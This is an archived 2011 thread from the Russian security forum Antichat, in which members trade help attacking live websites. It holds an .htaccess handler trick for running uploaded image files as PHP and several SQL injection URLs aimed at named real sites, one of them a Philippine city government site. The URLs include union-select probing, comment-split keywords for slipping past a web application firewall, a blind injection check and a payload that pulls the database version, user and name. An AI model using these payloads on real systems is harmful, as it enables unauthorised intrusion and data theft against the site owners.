HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18771  
Старый 04.12.2011, 19:31
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Попробуй залить .htaccess с содержанием:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]AddHandler application[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]gif

[/COLOR][/COLOR
 
Ответить с цитированием

  #18772  
Старый 04.12.2011, 19:42
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Попробуй залить .htaccess с содержанием:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]AddHandler application[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]httpd[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]gif

[/COLOR][/COLOR
Залил AddHandler application/x-httpd-php .php .html _php .png

smile.html(белая страница) i smile.png(изображение содержит ошибки..) не работают

При

AddType application/x-httpd-php .gif



Качает файл
 
Ответить с цитированием

  #18773  
Старый 04.12.2011, 21:08
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

wkar, бывает, что на некоторых серверах этот способ не могает...
 
Ответить с цитированием

  #18774  
Старый 04.12.2011, 22:27
shadowrun
Guest
Сообщений: n/a
Провел на форуме:
183267

Репутация: 84
По умолчанию

Код:
Code:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
union не нравится ему
 
Ответить с цитированием

  #18775  
Старый 04.12.2011, 23:37
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от shadowrun  
shadowrun said:
Код:
Code:
http://onlinewatch24.com/watch/Harry-Potter-and-the-Half-Blood-Prince%27+un/**/ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
union не нравится ему
Крути блиндом, по-другому не выйдет

_http://onlinewatch24.com/search?search=&p=1&f=title+and%20mid(version(),1,1 )=5+--+
 
Ответить с цитированием

  #18776  
Старый 05.12.2011, 00:31
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765

Репутация: 257
Отправить сообщение для A_n_d_r_e_i с помощью ICQ
По умолчанию

Цитата:
Сообщение от lightangel  
lightangel said:
I have a problem here.
Код:
Code:
http://www.pasigcity.gov.ph/subpages/news.aspx?nSeq=183+and+1=0+/!*union*/+/*!select*/+0,1,2,3,4,5,6,7,8
Код:
Code:
WebKnight Application Firewall Alert

Your request triggered an alert! If you feel that you have received this page in error, please contact the administrator of this web site.

What is WebKnight?
AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

For more information on WebKnight: http://www.aqtronix.com/WebKnight/

AQTRONIX WebKnight
How do I execute?
Your request is blocking firewall on the server

In the case of a specific vulnerability in firewall, you can spend an injection. More about this http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
 
Ответить с цитированием

  #18777  
Старый 05.12.2011, 02:59
lightangel
Guest
Сообщений: n/a
Провел на форуме:
35174

Репутация: -6
По умолчанию

I need a solution to my problem here.

Код:
Code:
http://accesssys.net/product_details.php?pid=109%27+and+1=0+union+select+1,2,3,4+--+
It's showing this.

The used SELECT statements have a different number of columns

Any help please?
 
Ответить с цитированием

  #18778  
Старый 05.12.2011, 03:08
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

lightangel

http://accesssys.net/solutions.php?sid=-100+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ve rsion(),user(),database()),10--
 
Ответить с цитированием

  #18779  
Старый 05.12.2011, 03:10
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

2lightangel /thread43966.html ты уже ***
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #18780  
Старый 05.12.2011, 20:52
stan0009
Guest
Сообщений: n/a
Провел на форуме:
39063

Репутация: 0
По умолчанию

Товарищи! Нужна ваша помощь!

короче вчера вечером тупо лазил по инету и на одной страничке нашел примерно такое:

Цитата:
Сообщение от None  
Warning: include(fuck.php) [function.include]: failed to open stream: No such file or directory in fuck/fuck/fuck.php
подскажите вид уязвимости^^

а далее сам чего нибудь накручу

если не получится то конешно отдам вам на растерзание))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ